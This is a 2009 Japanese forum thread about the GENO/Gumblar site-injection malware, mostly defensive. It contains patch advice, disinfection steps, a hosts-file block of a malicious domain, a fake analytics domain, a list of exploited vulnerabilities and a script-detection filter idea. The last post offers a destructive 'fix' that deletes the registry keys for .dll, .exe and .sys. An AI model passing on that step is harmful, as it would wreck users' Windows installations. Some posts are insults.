262192.168.0.774:2009/05/28(木) 17:35:08 ID:Mzk/ssdW0
月曜にきてたか [feed] http://blog.fc2.com/info/?xml
旧パスワード一斉無効措置付きか なるほどなー
263192.168.0.774:2009/05/28(木) 17:39:28 ID:GHs75aeF0
>>261
うちには5/21に来てる
分散して送るから,長いときは1ヶ月くらいかけてるね
複数アカウント持ってるとわかるw
264192.168.0.774:2009/05/28(木) 17:59:56 ID:Q+qjDG1G0
>>260
愛用していたアプリケーションが非対応だったから倦厭していたが、
Vistaってそんな機能があったんだな。
265192.168.0.774:2009/05/28(木) 18:28:38 ID:pUjLwD3e0
UACがなんなのかわからないやつがいてびっくり

今回はGENOどうこうより
初心者レベルの内容も熟知してないことが脅威だったわ
266192.168.0.774:2009/05/28(木) 18:56:31 ID:gkgYHsms0
誰も彼もがビスタ使ってるわけじゃないんだから
267192.168.0.774:2009/05/28(木) 20:32:46 ID:g4U0zyYz0
確かに>>264を見る限り>>264はVista使ってないよな
UACがなんなのかわからなくても全く問題ないw
268192.168.0.774:2009/05/28(木) 20:35:08 ID:wffocc+90
いや嫌々ながら使ってると取れる
269192.168.0.774:2009/05/28(木) 21:06:24 ID:TxXedgLr0
倦厭じゃなくて敬遠じゃないの?っていう突っ込みはナシ?w
270192.168.0.774:2009/05/28(木) 21:17:34 ID:wD+USA9K0
>>260
この記事の中に

>一部に「GENOウイルスには、セキュリティー対策ソフトが役に立たない」といううわさも
>流れていますが、それは間違いです。

って書いてあるんだけど…
271192.168.0.774:2009/05/28(木) 21:20:43 ID:7jbhXxMV0
亜種には対応していない
とも書いてあるけどな。一番はやったときに検体が提出されたものにはさすがに対応してるんじゃね?
試す気はないが。
272192.168.0.774:2009/05/28(木) 22:08:31 ID:qnsFnw2TO
cmdでのサイズチェックは問題なし、regeditも動作確認した
でもインターネットがくそ重い、ブラウザ変えても改善しない、DL速度が10KB/secも出なくなった

これは感染したと見ていいのかな…
273192.168.0.774:2009/05/28(木) 22:15:46 ID:wffocc+90
>>272
何でそうなるんだ
合理的な思考しろよ
274192.168.0.774:2009/05/28(木) 22:24:27 ID:Oax7cXyu0
使ってるセキュリティソフトが2chのどこに行ってもJS Downloador検出してまじでびびった
アップデートしたら直ったけどまじで心臓に悪い
275192.168.0.774:2009/05/29(金) 01:10:03 ID:piBcLweA0
自分は今日、ネットは普通に使ってるのに
Flashが何かわかってない人に出会った
Flashってなに?ってきかれて、まずどう返していいのか一瞬困ったw
知らなくても問題なく使えてしまうからだろうけど
276192.168.0.774:2009/05/29(金) 01:57:00 ID:vEUQiBSK0
Flashぐらいでびびるなよ
ファイアウォール知らないやつとかざらにいるぞ
277192.168.0.774:2009/05/29(金) 02:37:36 ID:OlQbOmgA0
Flash知らないくらいなら普通にいるよ
そんくらいなら動画サイト見てるなら入ってるよで通じるし
いちいち言うほどのことじゃない
つーかそれをバカにしちゃうほうがアレだわ
278192.168.0.774:2009/05/29(金) 03:11:05 ID:ehBR5T6V0
今は、ADSL 12MB が、約2千円、プロバイダのメール無しで約1.5千円なのに、
Yahoo! BB が値下げしない悪徳業者だと気づかないで契約時のまま 4千円近く
払わされている無自覚の感染者が何百万人もいるほうが驚くな

年間2万4千円多く徴収されているのに気づかない人たちを救ってやってったら、
景気回復するんじゃないのw


468 名前: 非通知さん 投稿日: 2009/05/17(日) 14:20:19 ID:3bcz0igI0
【ソフトバンク】
ソフトバンクBB鰍フ総合ブロードバンドサービス「Yahoo! BB ADSL」における、当期末の累積接続回
線数は429 万9,000 回線、当第4四半期のユーザー支払いベースのARPU は4,262 円となりました。
279192.168.0.774:2009/05/29(金) 08:45:40 ID:JsHSZpr50
パソコンには詳しくないからよくわからないけど怖いですね〜

…って書いてるサイト運営者が一番嫌だ。
280192.168.0.774:2009/05/29(金) 08:47:11 ID:x3Y9c4A10
これのメール版があるんだね
(((((((( ;゚Д゚)))))))ガクガクブルブル
281192.168.0.774:2009/05/29(金) 10:04:49 ID:4z/zw8YJ0
プリインストールで入れてるなら、更新についても責任持ってもらいたいもんだな
282192.168.0.774:2009/05/29(金) 10:55:56 ID:uOCaNFIZ0
http://changi.2ch.net/test/read.cgi/doujin/1242809411/806-
同人板のほうにアレな情報が
283192.168.0.774:2009/05/29(金) 11:26:57 ID:BthGL6et0
>上司から、お前の存在自体がセキュリティホールだ!と言われようとも
ぐのーむさんこんなこと言われてるのか・・・
あの活動が何のために行われてるのか上司は考えたことがあるのか
284192.168.0.774:2009/05/29(金) 11:31:03 ID:lYJ/D9vX0
>>282
別に不思議でもないんでもないっしょ。
285192.168.0.774:2009/05/29(金) 17:06:05 ID:foH44K5U0
体験者に一度きいてみたいんだが、感染サイトを踏んだらまず何がおきるんだ
adobe関係のウィンドウが開いたりするわけ?
286192.168.0.774:2009/05/29(金) 18:01:38 ID:3HxQrXqXP
割れ目がじゅわっ〜となる
287192.168.0.774:2009/05/29(金) 19:08:55 ID:VI53AlJ90
>>258の言うように、わけの分からない串を使うのは危険なのだろうが、
巻き添え規制をくらっているため、仕方なく串を使った。
IDの出ないセキュ板のスレへの書き込みなので、自演のためではないが。
288192.168.0.774:2009/05/29(金) 19:30:11 ID:unRBn1g50
2chにかける串ってどこで探してる?
289192.168.0.774:2009/05/29(金) 19:47:31 ID:btAPZUmJ0
>>285
様々だからわからん(環境次第)
290192.168.0.774:2009/05/29(金) 20:19:51 ID:/RoVQptw0
はじめはリストで弾くようにしていたけれども、リストを更新するのが面倒になったので、
unscapeなんて文字コードをテーマにしたサイト以外は碌な目的で使わないよねと思って、
evalとunscapeを含むコードがあったら、とりあえずコメントアウトして、アラートを出すProxomitronのフィルタを書いたのだけれども、需要あるかな。
へっぽこだから、ブログでこっそり公開しようかとも思ったのだけれども、需要があるようなら投下します。
291192.168.0.774:2009/05/29(金) 20:24:16 ID:KFlNWkjO0
ヒント:Google Analytics
292192.168.0.774:2009/05/29(金) 20:46:38 ID:OlQbOmgA0
>>287
つ ●
つ p2
293192.168.0.774:2009/05/29(金) 23:13:11 ID:zmeqzjSv0
294192.168.0.774:2009/05/29(金) 23:28:16 ID:Si5aZKJwP
おいおい

【XP厨死亡】DirectXに脆弱性
http://tsushima.2ch.net/test/read.cgi/news/1243591930/
295192.168.0.774:2009/05/30(土) 00:31:39 ID:e8IE9Rq3P
すっかり過疎ったな
296192.168.0.774:2009/05/30(土) 00:50:24 ID:2UGL94hdO
GENOに感染したまま、気付かずに1ヶ月ほどPC利用していました。
HP等は開設しついません。
個人情報が漏れるそうですが、ネットショッピングの際のログインパスワード等は大丈夫なのでしょうか?
297192.168.0.774:2009/05/30(土) 01:08:14 ID:NJoQk9Ql0
抜かれる可能性があると言われてたけどまだ報告はなかったような
心配だったら履歴を確認してパス変更でいんじゃね?インスコ済の話ね
298192.168.0.774:2009/05/30(土) 01:30:00 ID:ja4TbjLv0
前に、クローズアップ現代でボットの話題をやった回の動画ないですか?
299192.168.0.774:2009/05/30(土) 01:32:59 ID:i+8LuJWk0
>>298
うっせえハゲ。
300192.168.0.774:2009/05/30(土) 01:34:43 ID:2UGL94hdO
>>297
レスありがとうございます。
契約者名で大量のスパムが来ていたから変だとは思っていたんです。
現在は隔離済みです。
パスは一応変更しておきます。
1日10分ほどしか立ち上げないPCだったため、スケジュールスキャンをオフにしていましたorz
301192.168.0.774:2009/05/30(土) 01:45:18 ID:Xadobnvw0
なるべくならOSいれなおしたほうがいいけどお好みで
そのあとにオンラインサービス各種のパスワード変更
フリーメールのパスワードも変えてね
302192.168.0.774:2009/05/30(土) 02:09:41 ID:ja4TbjLv0
>>298
自己レス。見つかった。
GENOがボット目的かどうかはわからんが、
嫌儲はアフィチェッカーよりボットを憎むべきじゃないだろか?
303192.168.0.774:2009/05/30(土) 06:37:58 ID:gEls4z/j0
だいたいアフィチェッカーよりもatwikiがどんだけ儲けてると思ってるんだよ糞

yahooとか使うなよハゲ

論理的思考ができない嫌儲はBOTに感染して苦しむべき
304192.168.0.774:2009/05/30(土) 09:10:48 ID:tVJG0Fy00
なんかもうGENO関係なくね
305192.168.0.774:2009/05/30(土) 09:14:25 ID:K6dO28la0
沈静化したということで喜ぼう。
306192.168.0.774:2009/05/30(土) 09:28:15 ID:P85iemiB0
QT周りの脆弱性狙いでまもなく再開するよ。
307192.168.0.774:2009/05/30(土) 09:42:07 ID:cGiKVc7U0
パソコンの中のQTを検索してみたら、adobeの中にあったんだけど、大丈夫なんでしょうか?
もちろん最新バージョンにしています。
308192.168.0.774:2009/05/30(土) 10:03:58 ID:qdysrUs00
QTってゼロデイ状態じゃなかったっけ?
なんか、DirectXまで出てきたし、やり方確立したら騒ぎになるかもね
309192.168.0.774:2009/05/30(土) 10:22:10 ID:P85iemiB0
>>307
Acrobat 3D用のプラグインでしょ。
存在すること自体は問題ない。

>>308
そう。Apple製品で脆弱性が見つかると、ほとんどいつもゼロデイ状態になる。
310192.168.0.774:2009/05/30(土) 13:34:46 ID:xI0fhZRq0
311192.168.0.774:2009/05/30(土) 14:40:48 ID:u7Zs/D5w0
purser: 旅客係(一般人の意味のパーサー。<=>IT用語のパーサ)

ぐのむたんしっかり汁w

なんにせ、マルチメディア系のもんは何だって信用ならん

…みんなまるごと砂箱逝き。
312192.168.0.774:2009/05/30(土) 15:26:29 ID:vgPL/By80
ttp://headlines.yahoo.co.jp/hl?a=20090530-00000433-yom-soci

>同省岐阜国道事務所の道路状況を伝えるサイトも改ざんされ、
>閲覧者のパソコンがコンピューターウイルスに感染する状態になっていた。
>改ざんは同7日から行われていたとみられ、
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。

これもしかしてGENOか?
313192.168.0.774:2009/05/30(土) 15:30:56 ID:K6dO28la0
国交省のかな?そんな報告あったはず。
314192.168.0.774:2009/05/30(土) 16:26:14 ID:+gwIZfhs0
>>312
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。

ひどい話だな。GENOだろ
315192.168.0.774:2009/05/30(土) 16:53:10 ID:ClpJp3oP0
だいたい半数がXP/2000ユーザーだとすると、それでも3500件か…。
316192.168.0.774:2009/05/30(土) 19:01:05 ID:ZoOVnb3tO
色々デカイサイトが感染してると
俺のサイトで感染したのが誤魔化せるからありがてー
317192.168.0.774:2009/05/30(土) 19:39:19 ID:3MWi+wus0
新しいPCかOS買えウィルス?
318192.168.0.774:2009/05/30(土) 20:39:53 ID:u7Zs/D5w0
買ったら負けかなと思ってる奴は、意地で買わんから、ま、そんなにそうはならんだろ
319192.168.0.774:2009/05/30(土) 22:28:33 ID:J5jeyF8C0
QuickTimeってadobe製品なんですか?
320192.168.0.774:2009/05/30(土) 22:42:02 ID:rUA0di420
GoogleはAdobe製品じゃないですよ
321192.168.0.774:2009/05/31(日) 02:43:28 ID:+yn1Qi0T0
GENOウイルスチェッカーのサイトいったら
フラッシュでIE用の更新が来てたが
adobeのサイトからはどうやっていくんだ?
チェッカーのURLはexe直なので、なんかいや。
322192.168.0.774:2009/05/31(日) 02:54:04 ID:Ncu0YETE0
>>321
調子こいてんじゃねえよ、クズが
323192.168.0.774:2009/05/31(日) 03:05:14 ID:nxL2UMVc0
ブログのコメント欄や、wikiに大量に投下されるスパムは
GENOと関係ありますか?
324192.168.0.774:2009/05/31(日) 03:21:53 ID:L/RlP11XP
いいえ
325192.168.0.774:2009/05/31(日) 12:36:21 ID:f92421kK0
>>321
Flash Playerの更新なんて来ていないよ。
あれはページ内の記述に訂正更新があっただけ。
紛らわしい書き方なんで、あなたと同じく勘違いした奴が多数。
326192.168.0.774:2009/05/31(日) 14:56:31 ID:qnzGlpd70
PCに詳しいこちらの住人の皆様に聞きたいのですが…

GENOも大分落ち着いた…ということを聞き、久しぶりに趣味の
サイト巡りをしていたところ、私のPCのセキュリティが何らかの
ウィルスに反応し、削除(?)を行いました。
念のため、【まとめ】にあるやり方を見ながら再度ウィルスチェック
をしたところ、幸いなことに私のパソコン(Vista)は感染を免れて
いました。

こういった場合、サイトはウィルスに侵されていると考えてもよいので
しょうか?表ページには週2回の自動ウィルスチェックが入っていると
なっていましたが…。
もしウィルスに侵されているのならば、ほかの人がウィルスに侵される
危険があります。なので、管理人さんにウィルスに侵されているのでは?
とメールを送りたいのですが、今度閲覧してウィルスに侵されたら…と
思うと、恐ろしくてもう一度そのサイトを開く気になれないのです。

こういった場合、何らかの伝達手段はありますでしょうか?
327192.168.0.774:2009/05/31(日) 15:02:15 ID:YRT85t+60
>>326
携帯で開いて知らせれば?PCビューアーとか今はついてるでしょ
328192.168.0.774:2009/05/31(日) 15:10:08 ID:Ncu0YETE0
>>326
パソコン持って逃げろ
329192.168.0.774:2009/05/31(日) 15:10:43 ID:qnzGlpd70
>>327
ありがとうございます。
携帯は国外在住のため、所持していないのです。
もう、他の方がお知らせしてくださるのを待つしか手はないですよね。
330192.168.0.774:2009/05/31(日) 15:43:20 ID:yExQo+6e0
>>329
URLをここに晒せばいいじゃん。
331192.168.0.774:2009/05/31(日) 16:41:46 ID:9R9WK3IZ0
感染しました。
http://geno.2ch.tc/
の「GENOウイルス感染からの復帰方法」を途中までやってわからなくなってしまいました。

* C:\WINDOWS\Prefetch 内を全部削除
* [Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
* スタートアップに何も書かれていない行があったのでチェックをOFF
* regeditを起動して(起動できない場合は command を実行してその中から regedit を実行)
* \\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの一番上が (規定) REG_SZ (値の設定無し) になっていることを確認 再起動
* C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
* 正常なsqlsodbc.chmに差し替え

コマンドプロンプトでreceditを起動し
「〜の一番上が (規定) REG_SZ (値の設定無し) になっていることを確認」
する方法を教えていただけないでしょうか。
332192.168.0.774:2009/05/31(日) 16:47:45 ID:+8joFj3w0
>>331
リカバリしろカス
333192.168.0.774:2009/05/31(日) 16:55:57 ID:pWZzGSp1P
c:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
334192.168.0.774:2009/05/31(日) 18:51:04 ID:c3DaDWZu0
あのサイト見るな
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
335192.168.0.774:2009/05/31(日) 20:05:10 ID:Cyam+zfo0
Firefoxも基本機能の設定でスクリプトを無効にできる。
Noscriptほか拡張は、それ以上を求める人向け。
336192.168.0.774:2009/05/31(日) 20:18:52 ID:nC9VmBzmO
前まではNosc使って許可するしないで迷ってたけど
根本から切っちゃったらラクになれたわ
337192.168.0.774:2009/05/31(日) 20:28:11 ID:ptHEwX4Z0
>>334
粘着死ねうざい
338192.168.0.774:2009/05/31(日) 20:34:33 ID:ez9DL56A0
SINEとかいうんだ
勝手にテンプレ変えてヒッシだな
339192.168.0.774:2009/05/31(日) 22:03:41 ID:VISqyoYW0
>>334
不十分でもあなたよりはそのサイト役に立ってますよ、きっと

セキュ板の話題をここにもちこまないでください
340192.168.0.774:2009/05/31(日) 22:10:59 ID:wzRIkfFE0
役にたたねえよ
341192.168.0.774:2009/05/31(日) 22:20:47 ID:wzRIkfFE0
まーテンプレは直さな
セキュ板の話題だ言っても
引用先はそれでかしらんが修正したんだからな
脈絡無くリンク入ってるし
342192.168.0.774:2009/06/01(月) 01:23:58 ID:R+p/tPKN0
>>339
管理人乙です。
343192.168.0.774:2009/06/01(月) 16:50:37 ID:gRaxrwT0P
新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/
344192.168.0.774:2009/06/01(月) 17:20:49 ID:RXEaw0Ub0
>>343
やっぱり似たようなのが出てきちゃったな。
このタイミングで出てきたってことはQTの脆弱性も使われてそうだ。
345192.168.0.774:2009/06/01(月) 18:22:36 ID:o7C9L8Ls0
>>343
対応してる4社ってどこ?
き弱性なんてかなり前からわかってたのに何やってんの?
346192.168.0.774:2009/06/01(月) 18:26:43 ID:r9BK4C1O0
き弱性・・・?
347192.168.0.774:2009/06/01(月) 18:37:50 ID:vHlvNban0
もろよわせいだろjk
348192.168.0.774:2009/06/01(月) 18:44:12 ID:sEf/HHkG0
マジか?
こんどは何の脆弱性使用してるんだ?

収束したと思って、普通にサイト見始めちゃってたよ。
349192.168.0.774:2009/06/01(月) 18:47:57 ID:W/jhCmDA0
つかってる脆弱性そのものは同じじゃないのかな
350192.168.0.774:2009/06/01(月) 18:53:12 ID:sEf/HHkG0
リンク先見ると、virustotal へのリンクあるね。
対応してる4社の名前も確認できるかも。
しかし、トレンドマイクロが対応してるとは…

DrWebも対応してるみたいだし、CureItで検索かけてみるかな…
351192.168.0.774:2009/06/01(月) 19:04:20 ID:B9YOsgHE0 BE:1789209869-2BP(0)
偽GAってのは、 googleanalytlcs.net らしい
一応すでにぐぐるSB入りしてるけど、ぐぐるSB非対応のブラウザは注意が必要
352192.168.0.774:2009/06/01(月) 19:20:34 ID:G/58Ch8R0
何だよ再燃かよ。これからどんどん出てくるかね
353192.168.0.774:2009/06/01(月) 19:31:48 ID:EN9NgtDC0
結局クーグルちょろめ最強か
354192.168.0.774:2009/06/01(月) 20:57:57 ID:qG9351lq0
ぐぐるSBってなに?
355192.168.0.774:2009/06/01(月) 21:18:46 ID:B9YOsgHE0 BE:2087410897-2BP(0)
おっとあっちに書いてしまった どっちでもかまわんが、どっちかに固めるつもりだった

http://pc11.2ch.net/test/read.cgi/sec/1243346768/575
356192.168.0.774:2009/06/01(月) 21:55:31 ID:B9YOsgHE0 BE:894604493-2BP(0)
MS06-014 KB911562 (MDAC)
MS06-057 KB923191 (WebViewFolderIcon)
MS06-067 KB922760 (WinZip, killbit)
MS09-002 KB961260 (IE7)
QuickTime: わからんが、2007年には出現していた手口の様子

…MS09-002 以外、なんか古いやつばっかり…本命じゃないの掴まされたかな
てきとーにスクリプト読み直してみるか
357192.168.0.774:2009/06/01(月) 23:21:23 ID:gRaxrwT0P
MS06-014は常連だなあ
358192.168.0.774:2009/06/03(水) 15:08:36 ID:3dZzweiq0
Acrobat,Flash,QTとかの類は全部アンインストールして
Javascript切るしかないな
359192.168.0.774:2009/06/03(水) 15:13:30 ID:2xEHinnPP
終息したみたいだね
360192.168.0.774:2009/06/03(水) 15:24:36 ID:5t7XiWC30
出遅れたけど聞いておこう。
ffdshowみたいなコーデック集にも、同じ脆弱性あるのかな?
361192.168.0.774:2009/06/03(水) 15:36:24 ID:U4wE4RiO0
なんという無意味な問いだ
広い意味では同じ脆弱性があるとも言えるが
狭い意味では同じ脆弱性があるわけないだろ
362192.168.0.774:2009/06/03(水) 23:44:13 ID:/fJlB1oR0
偽サイトにユーザーをリダイレクトするコードが蔓延--ウェブセンスが警告
http://japan.cnet.com/news/media/story/0,2000056023,20394265,00.htm
363192.168.0.774:2009/06/04(木) 20:51:18 ID:ovRMQuOx0
>>209 とりあえずは塞がれたらしい。

iPhone OS 3.0対応の「iTunes 8.2」公開、「QuickTime 7.6.2」も
http://internet.watch.impress.co.jp/cda/news/2009/06/02/23636.html
364192.168.0.774:2009/06/04(木) 21:14:00 ID:ek6ha3Fn0
でもDirectShowの脆弱性が解決してないので
QuickTime関連がヤバイ現状には変化なしw
365192.168.0.774:2009/06/04(木) 22:17:47 ID:9yOhj3HV0
それはQTではなくDXの問題
それにウェブブラウジング中にDX動かすなんてのもないと思う
366192.168.0.774:2009/06/04(木) 22:48:03 ID:ASeSs5VK0
QuickTime側入れ替えても解決しない問題箇所だからね。
367192.168.0.774:2009/06/04(木) 23:39:31 ID:fBOkvqee0
まぁ、QTが対策されたことによって、webから直接DirectShowの穴叩くのは難しくなったか
368192.168.0.774:2009/06/04(木) 23:57:02 ID:yg7JUHlK0
>>364-366で指摘してるDirectShowの問題って
http://internet.watch.impress.co.jp/cda/news/2009/05/29/23606.html
の事だよな?

DirectShowのファイルオープンってフィルタ・スプリッタ経由でやってるはずで、
QT用フィルタ・スプリッタが無ければQT開くもヘッタクレも無いはずだから、
これはQT用フィルタ・スプリッタのバグで起きてる問題だと見るべきだよな。
・・・素直にDirectShow用QTコーデックのバグって書いて欲しい。
そうすると、改変QTファイルをDirectShow利用プログラム経由でQT用フィルタ・スプリッタに通すと発症するって事になる。

で、DirectShow用QTコーデックのバグには>>363では触れられてない。
>>367
なので全く難しくなってません。
そもそもQTPlayerでは自前でデコードするだろうから、QTPlayerでQT開く時には元々発症しないんじゃないかな。
369192.168.0.774:2009/06/05(金) 00:22:27 ID:wJ6nVbq00
要するに、脆弱性の解決したQTプレイヤーの最新版を入れて
それでQTファイルを開く分には問題ないってこと?
370192.168.0.774:2009/06/05(金) 00:53:14 ID:geb9McX00
大昔、QuickTimeを、Windowsのメディアプレーヤで再生できた時期があったんだよ
そのときの名残が、最近ではWindows同梱のquartz.dll ってのにあって、そこが問題になってる
アンチAppleにはどっちにしたってむかつく話だろうが、とりあえずQuickTime更新しても、
MSが修繕して、アップデートしてくれるまでは、こっちは直らないわけだな
371192.168.0.774:2009/06/05(金) 01:13:28 ID:SMLB9Vzg0
誰が使ってるのかわからないような機能がいちばん危険だよな。
372192.168.0.774:2009/06/05(金) 01:50:42 ID:geb9McX00
PDFもそう。確かに、分野によっては欠かせないものだが、それ以上に幅広く、
無駄にPCにプレインスコされて出荷され、そのまま死蔵になってる

回線がしっかりしてれば、いるときに落としてくればいいと思うんだけどな
とはいっても、いざというときに目を通したことにしておいてくださいという
周辺機器の説明書がPDFだと、どうしてもリーダも同梱になっちまう
373192.168.0.774:2009/06/05(金) 01:57:08 ID:VdpfbXko0
大昔に入れたクイックタイムおるたなんとかが入れっぱなしになってるんだが
消したほうがいいのかな
374192.168.0.774:2009/06/05(金) 02:00:01 ID:kF2EDitC0
>>372
んだんだ。
周辺機器のマニュアルの類はpdfであることが多いよな。
ルータも無線カードもMOも外付けHDDも複合機も、
更にメーカー製だとバンドルソフトのマニュアルまでもがpdfだったり。
375192.168.0.774:2009/06/05(金) 02:45:18 ID:eYXhsJxW0
>>373
QuickTimeムービーを再生することがないなら消せばいい。
再生することがあるなら最新版に更新しておけ。
376192.168.0.774:2009/06/05(金) 03:00:29 ID:6SIDmEC50
ある程度の普及率を持つソフトウェアは全て
・最新バージョンチェック機能つきインストーラ
  →CDに同梱する場合等、オフライン環境にもインストールが可能であり、オンライン環境ならば最新版をインストールできるのが望ましい
・実装上再セットアップであってもそれを意識させないオンラインアップデート機能
  →インストーラのダウンロードまでしか面倒を見ない物だと、入れるのが億劫になって無視しがち
・明確なスケジュール・トリガのあるアップデートチェック機能
  →いくら修正しても、アップデート通知が出なかったりしたら意味ないですよ、Adobeさん、Symantecさん。
を持っていてくれないと危なっかしくてしようが無い
・・・と思う。

コーデックみたいなプラグイン系はちょっと難しい所があるのが難だが・・・
起動時にアップデータをRunOnceに放り込むとかで常駐無しに安全性を確保することも不可能じゃないのにな。
377192.168.0.774:2009/06/05(金) 03:32:03 ID:geb9McX00
アップデートするモチベがない
アップデートすると、重くなる(かも?って勝手な予想するのも含む)となると、余計アップデートしない

せめて、オフライン版は、ブラウザにプラグイン入れない。とか。w
腐ったファイルをメールに添付して踏ませるのには無効だが、ブラウザ経由でってのは減らせそう
378192.168.0.774:2009/06/05(金) 09:19:48 ID:jt2tl6gS0
wmv呼び出すようにwebに貼り付けて、細工したqt再生するようにしておけばイケるのか

まぁ、Win7への移行が進めばASLRが効くから、この手の問題はおおよそ解決するんじゃないかな
あとは、携帯みたいに、機種毎に微妙に仕様違っていて、影響範囲が限定的になるとか。

そうやって考えると、数年前にASLR実装して、マイナー違いだらけのLinuxってすげぇよなとか思ったり。
379192.168.0.774:2009/06/05(金) 11:02:29 ID:9oazRdMR0
>>370
quartz.dll の役割を今初めて知ったよ
WM機にもそのファイルあるんだけどさ
380192.168.0.774:2009/06/05(金) 15:20:40 ID:geb9McX00
>>379
quartz.dll が、そのQuickTime(それも旧形式)だけをみてるんなら、あぼんすればおしまいなんだけど、
他にもいろいろ基盤的な処理をしてるDLLなので、一概にそうもできないわけね

IEとかと同様、どうしてもバグフリーにできない複雑なコンポーネントだから、ビジネス用途の端末とか、
動画とか一切いらないPCなら、あぼんしとけばいいかも 実際にそういう攻撃遮断策も紹介されてる

だいたい、そうゆうもん
381192.168.0.774:2009/06/05(金) 16:41:00 ID:5sVAYN+A0
>>376
あとは ADM とか配布して組織内で集中管理出来るようにしてほしいね。
382192.168.0.774:2009/06/06(土) 14:59:57 ID:izh1au960
383192.168.0.774:2009/06/06(土) 16:42:22 ID:Xz0CFMXE0
これからもGENOと似たようなウイルスが普通に蔓延する模様

「Baladen」による大規模サイト改ざん、コード難読化で検知回避
http://internet.watch.impress.co.jp/cda/news/2009/06/03/23670.html
384192.168.0.774:2009/06/06(土) 17:41:02 ID:lqce6X1B0
>>382 ちょっと見ないうちに、こんなに便利になってたのか。あとでみてみる
385192.168.0.774:2009/06/06(土) 19:10:19 ID:lqce6X1B0
落としてみた。これは便利かもしれん sysinternal好きなら気に入るとおもわれ
386192.168.0.774:2009/06/07(日) 02:02:38 ID:M7AHivT40
sysinternal好きならっていうか、sysinternalそのものだよな
387192.168.0.774:2009/06/07(日) 07:34:05 ID:RGnVDoX80
sysinternal好きなら、sysinternalでなんとなーくそろえるでそw そゆ意味
388192.168.0.774:2009/06/07(日) 09:50:33 ID:2PGpvmxT0
>>382,>>385-386
使ってみた。結果は Possibly Infected: ....0。
sysinternalのことは浅学非才の身なので知らない。
389192.168.0.774:2009/06/07(日) 14:48:04 ID:1hLnbE2g0
>>388
sysinterna社ってのが以前存在してWindowsの管理用ツールを販売、一部無料公開してた
それをMicrosoftが買収して、元sysinternalのフリーダウンロードページがMicrosoftの一コンテンツとなってる
アップデートもされてるっぽいからとりあえず全部おとしてURLをBMしとくといいよ
390388:2009/06/07(日) 17:11:33 ID:2PGpvmxT0
>>389
ご親切なレスに感謝!
おかげさまで、すぐたどり着けました。

Sysinternals ホーム
ttp://technet.microsoft.com/ja-jp/sysinternals/default.aspx
Sysinternals ダウンロード
ttp://technet.microsoft.com/ja-jp/sysinternals/bb545027.aspx

とても参考になります。ありがとうございます。
391192.168.0.774:2009/06/10(水) 02:51:41 ID:F4oni6Pd0
類似動作の新型の情報がようやく出はじめましたね。

どこの方かは存じませんが、解説している人、乙であります。
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=cn%A5%C9%A5%E1%A5%A4%A5%F3%A4%F2%CD%F8%CD%D1%A4%B7%A4%BF+cocacola+%2C+income+%2Cpepsi+%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3
392192.168.0.774:2009/06/10(水) 21:05:59 ID:/rWKXzaA0
今回のreader(9.1.1)更新も
>adobe readerを開いて ヘルプ→アップデートの有無をチェック

でおkスか?
393192.168.0.774:2009/06/10(水) 21:13:50 ID:/rWKXzaA0
↑すんません、アップデートしました。
394192.168.0.774:2009/06/11(木) 01:28:02 ID:Imp2Uwco0
>>392-393
おk。そして、9.1.2への更新な。
395192.168.0.774:2009/06/11(木) 17:18:29 ID:uOndiU0l0
adobe readerが9.1.2になった
396192.168.0.774:2009/06/11(木) 21:49:28 ID:jMVQpTl20
>>395
チラシの裏に書いてろクズ
397192.168.0.774:2009/06/11(木) 23:04:12 ID:9O3T7NN/0
398192.168.0.774:2009/06/12(金) 01:00:05 ID:qtX3J3f5O
何これ?
399192.168.0.774:2009/06/13(土) 00:10:50 ID:7Q2x+i690
GENOウイルスのサイト改ざん被害、国内で400件以上確認される
http://internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html
400192.168.0.774:2009/06/13(土) 10:17:18 ID:t6zoMOJ60
これは酷い
401192.168.0.774:2009/06/13(土) 22:22:05 ID:3M+6Njb90
1.regeditが直接起動しないので、ファイル名指定でcommandを実行、DOS窓を出す。
2.DOS窓からregeditを起動。
3.下記レジストリデータを確認。あれば感染している
  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux?
4.キー指定のファイル名をC:\WINDOWS\から削除
5.正常なsqlsodbc.chmファイル(サイズ50727byte)をC:\WINDOWS\system32\に上書きコピー
6.先程のレジストリデータを削除。
7.下記のキーが無いことも確認する。
  HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperation
8.再起動

このもっと詳細なやり方教えて下さい。
402192.168.0.774:2009/06/13(土) 22:27:03 ID:yW44nLjk0
>>401
そんなことしなくても
レジストリエディタを開いて、以下のキーを全て削除して、再起動でおk
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
